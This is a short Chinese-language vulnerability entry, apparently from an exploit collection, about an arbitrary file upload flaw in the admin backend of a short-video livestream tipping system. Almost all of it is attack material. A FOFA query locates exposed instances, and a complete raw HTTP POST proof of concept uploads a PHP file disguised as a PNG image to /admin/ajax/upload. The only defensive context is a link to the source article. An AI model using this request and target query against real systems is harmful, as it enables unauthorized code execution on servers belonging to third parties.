# 某短视频直播打赏系统后台任意文件上传漏洞



## fofa

```java
"Location: https://m.baidu.com" && domain!="baidu.com" 
```

## poc

```java
POST /admin/ajax/upload HTTP/1.1
Host: 127.0.0.1:81
Content-Length: 290
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqVHCE6rweLU4xoLd
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:81
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:81/admin/stock/add?d=dsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: userid=1; PHPSESSID=300471c6cebde33867306a662af88460
Connection: close

------WebKitFormBoundaryqVHCE6rweLU4xoLd
Content-Disposition: form-data; name="type"

php
------WebKitFormBoundaryqVHCE6rweLU4xoLd
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundaryqVHCE6rweLU4xoLd--
```

![image-20240811141210187](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408111412286.png)



## 漏洞来源

- https://mp.weixin.qq.com/s/zg5H5dPoJbLrKEQLY9FfYA